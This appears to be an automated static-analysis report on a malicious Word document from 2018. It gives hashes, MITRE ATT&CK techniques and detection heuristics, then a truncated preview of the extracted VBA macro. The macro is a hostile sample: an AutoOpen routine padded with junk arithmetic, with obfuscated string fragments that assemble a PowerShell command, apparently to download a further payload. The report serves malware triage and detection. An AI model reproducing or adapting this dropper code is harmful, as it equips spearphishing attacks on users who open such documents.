Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 29b44011a541d736…

MALICIOUS

Office (OLE)

101.5 KB Created: 2018-02-13 17:41:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 51152560d745cfccb82243d54e006ab4 SHA-1: b2c9658189a59c6509680ccf0cab35a2f419a89c SHA-256: 29b44011a541d73661a141b256bbdcd31f4ee6c80cccd94e2fe43761fe916cbc
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The critical heuristic firing for Shell() call in VBA, combined with the AutoOpen macro, strongly suggests the execution of a secondary payload. The obfuscated script attempts to construct a URL, likely for downloading additional malware. The presence of a Shell() call and the AutoOpen macro points towards a malicious document designed to execute arbitrary code, fitting the pattern of a spearphishing attachment.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://iyl+iylwww.enjnZ1+nZ1oye In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26326 bytes
SHA-256: 097d967c1956d5386670a589dd693cf6e3c8caaf77155447648d7cb6a40364c2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oOrLdDSddU"
Sub AutoOpen()
On Error Resume Next
mIQGDhBXK = Itjmr - Sgn(pdqUOhfrYkVqEf) - (24989 - Tan(8305373) / 6317623 - ChrW(IsQ))
AUTcGJoKr = KbS - Sgn(ZqjD) - (882933 - Tan(5523430) / 4875551 - ChrW(TMLSfIQMhd))
wioIXsIXq = hjLOlaaAAw - Sgn(PrS) - (211060 - Tan(1463390) / 3146888 - ChrW(djtiWjcjPQTn))
Application.Run "wAsSbVzCS", wWYmDfMPtUovCl
vjmsznAwh = hQLi - Sgn(irWHPcUu) - (2005456 - Tan(7467715) / 607595 - ChrW(imCKK))
hMDXdwSNH = GYwdSoG - Sgn(stJDLbmbGwiVK) - (5957811 - Tan(8977805) / 4486456 - ChrW(ziCEsDtIINV))
LJkUYsJRB = AbkCsVjlJ - Sgn(dbuTJDozp) - (2919865 - Tan(9148259) / 617405 - ChrW(RPwMKz))
End Sub
Function wWYmDfMPtUovCl()
On Error Resume Next
ncpWpV = joVBPhTiaQvpMj - Sgn(pko) - (7414882 - Tan(2184142) / 9291198 - ChrW(UASbwZDTrqtn))
PcjNAaWZ = NTw - Sgn(pUXIdjXCd) - (3844479 - Tan(8448747) / 6764731 - ChrW(OqCvT))
kDzTwAh = ioktiHY - Sgn(vYfq) - (4227483 - Tan(7434727) / 2513743 - ChrW(qYfrRuZSFLkicC))
EjWbIJsojvQ = kfJwCWNffqK + Mid(knsrvmnBozqWnG + "JQwNvNjKjSJJJhZ12KdnZ1)2Kd'+'&( ([StrIng]Jq9VErbOsEprEfeRbvn+bvnENcE)[1,'+'3]+nZ1xnZ1-joINnZ1nZ1)bvn)-rePLace ([cH'+'ar]50+[cHar]75+[cdumXPBWJoalWzMz" + tiMPNYhTBBC, 15, 120)
jnhAiJQu = nXzWXarQffnmS - Sgn(VbpniKCHsRvbY) - (7718924 - Tan(7205917) / 4952452 - ChrW(JCiqafzZZ))
RIpAt = jwkoQVTwM - Sgn(jQRqffjaw) - (384819 - Tan(575208) / 5982725 - ChrW(Cijk))
lMbjLAku = uwqO - Sgn(jTJH) - (5598594 - Tan(5963999) / 1142565 - ChrW(rYwt))
zYGtSzHuB = ItzPnFatAEib + Mid(zdVwzRzdP + "adRWXaZKhHt(sRK?iynZ1+nZ1l+iynZ1+nZ1lsiyl+iynZ1+nZ1lRK);iyl+iyl3iyl+iylcbvn+bvniylbvn+bvn+iylmSiyl+iylDC =bvn+bvn 3ciyl+iylmeiynZ1+nZ1l+iylniyl+iylv:iyl+iylpublic + sRiyl+i'+'ylK8RzsvlQJKnXI" + DoPRoTXuc, 11, 172)
tmrZE = wrtAwSljMPR - Sgn(SzUpqHIX) - (6378065 - Tan(719196) / 4286484 - ChrW(XwcmaMziZZjt))
WOwik = BTVjfVG - Sgn(wkw) - (4123147 - Tan(1502618) / 3974165 - ChrW(BlDuVDdApzGzSi))
wQpMatwVdMC = tNbUpnnoBiPlYM - Sgn(QSrwhoVpY) - (3460038 - Tan(4578642) / 3827018 - ChrW(kZVoVwqkun))
WwSzYo = lsLuzYcXXEsiK + Mid(lOBQnVMhWV + "BBCfqJuKBPsOkfwVnnKphyl+iylEiyl+iylOadFIuqEleiyl+iynZ1+bvn+bvn'+'nZ1'+'lD'+'fe(iyl+iynZ1+nZ1l3cmasfiyl+iylciybvn+bvnl+iyl.iyl+i'+'ylDfiyl+bvn+bvniyleTiyl+iyloSiylnZ1+nZ1+'+'iyltiyl+iylruqiylnZ1+nZ1+iylEiuqENgDfiyl'YfwbiR" + CvqzLGJI, 22, 193)
UTRCLjAlGO = UrTdSATjTClN - Sgn(VnSLqkN) - (8302742 - Tan(951579) / 8744039 - ChrW(ziBiRSLI))
WKPshi = jjTEvkBwnpBqw - Sgn(umDh) - (6172371 - Tan(8921544) / 9834128 - ChrW(PztdozoPAqdSop))
ZzMRlMWjF = NQGiPDP - Sgn(jAYGsNkfNwjQV) - (2156130 - Tan(3424581) / 9286111 - ChrW(JYo))
VOOWUJcBWJ = LNzCLFREnLi + Mid(HTALYYDCRTID + "OijAzwZ1+EqKBljLsFJQQcfEuDCJqfZGwjV" + MbQZWtWfM, 7, 3)
GOwzoEvUOK = zCwKjFfb - Sgn(WUGBZXSFCL) - (8295891 - Tan(3224653) / 3077263 - ChrW(ojJ))
iZkPcXhW = XYzzJM - Sgn(VnTPiiNYYm) - (1536481 - Tan(1862650) / 8437655 - ChrW(dzFMKNHh))
TXJUujWFBzc = JdX - Sgn(IChZLtUEkwpXh) - (5711151 - Tan(8505061) / 8293999 - ChrW(jWRqta))
ziiwpL = MfRFSpRZ + Mid(kszFJ + "hMiSWCQHAoFsDCZCwJRAEsYMREZObACE '+'iyluqEiyl,[Char]96-rePlAc'+'e (bvn'+'+bvn[Char]115+[Char]82+[Char]75),[C'+'har]39-nZ1+nZ1rePlAce([Char]6bvn+bvn8+[Char]102+[Char]101),[Char]34) Cje&bvn+bvn( 51eIs" + QswBQLPWE, 30, 167)
qOwmMFYCrRT = NuvRwoEPuYWz - Sgn(kGu) - (4580022 - Tan(46298) / 5418967 - ChrW(vUPIwzhiC))
HLrYaOYkUUa = qtDYiVbBvJL - Sgn(iLtqlrAL) - (5749760 - Tan(2767658) / 911 - ChrW(tsfmU))
HUfBDUM = GZNJhdwcCkSWFS - Sgn(WmDPGOq) - (5655190 - Tan(8278817) / 1341485 - ChrW(tsipqpjwD))
MYWMAdpcdV = kwzYnmKlHmFVrN + Mid(QXStwPpdkPqmcH + "cCcfvSrNUwnFhXq'$') ) rsrGzNjiTrzYB" + BOco, 16, 7)
NkvpIkm = zzTLAH - Sgn(OSSMmppVYj) - (8135669 - Tan(2178884) / 5390280 - ChrW(QRASMNtC))
AVjSs = CfPjYDmY - Sgn(qif) - (1961038 - Tan(4411562) / 9250855 - ChrW(qUrATVtYr))
UHvPEiKY = hSsotoMvQh - Sgn(GQSmHn
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.